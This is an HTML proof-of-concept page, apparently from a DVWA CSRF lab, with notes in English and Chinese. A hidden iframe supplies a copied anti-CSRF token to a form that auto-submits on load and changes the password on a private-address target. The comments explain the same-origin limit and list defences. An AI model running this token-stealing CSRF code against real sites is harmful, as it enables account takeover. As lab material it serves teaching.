<!--
  CSRF lab page. The target is an RFC 1918 address and the path suggests a
  DVWA training instance.

  What the page does: it loads the password-change page in a hidden iframe,
  copies that page's anti-CSRF token (user_token) into the hidden form below,
  and submits the form as soon as this document has loaded.

  Caveat for readers: reading contentWindow.document is governed by the
  same-origin policy. When this page and the framed page have different
  origins, the browser refuses the access, attack() throws, and submit() is
  never reached. The per-request token therefore holds against a third-party
  site; it stops helping once script can run inside the application's own
  origin.

  Defensive points visible in this request:
    * the state-changing action is sent with GET; it should be POST-only
    * the request carries no current password; requiring it for a password
      change would stop this flow even with a valid token
    * the page can be framed; X-Frame-Options or a CSP frame-ancestors
      directive on the target would refuse that
    * SameSite session cookies limit which cross-site requests are
      authenticated at all
-->
<script type="text/javascript">
  function attack() {
    // Hidden token field of the form in this document (first match by name).
    var tokenField = document.getElementsByName('user_token')[0];

    // Document loaded inside the hidden iframe. Same-origin only: across
    // origins the browser denies this access and the function stops here.
    var framedDoc = document.getElementById("hack").contentWindow.document;

    // Copy the token issued to the framed page into this page's form.
    tokenField.value = framedDoc.getElementsByName('user_token')[0].value;

    // Send the password-change request together with the copied token.
    document.getElementById("transfer").submit();
  }
</script>

<!-- Hidden frame whose only purpose is to obtain a page holding a fresh token. -->
<iframe src="http://192.168.153.130/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;">
</iframe>

<!-- onload fires after sub-resources, including the iframe, have loaded. -->
<body onload="attack()">
  <form method="GET" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/csrf">
    <input type="hidden" name="password_new" value="password">
    <input type="hidden" name="password_conf" value="password">
    <!-- Empty until attack() fills it in. -->
    <input type="hidden" name="user_token" value="">
    <input type="hidden" name="Change" value="Change">
  </form>
</body>
跨站取目标站点元素值（注意：仅当当前页面与 iframe 中的目标页面同源时才能读取；跨源时浏览器的同源策略会拒绝访问 contentWindow.document）：
// Reads the value of the first element named 'user_token' from the document
// loaded in the iframe whose id is "hack".
// contentWindow.document is reachable only when the framed document has the
// same origin as the page running this script; across origins the browser
// denies the access.
document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value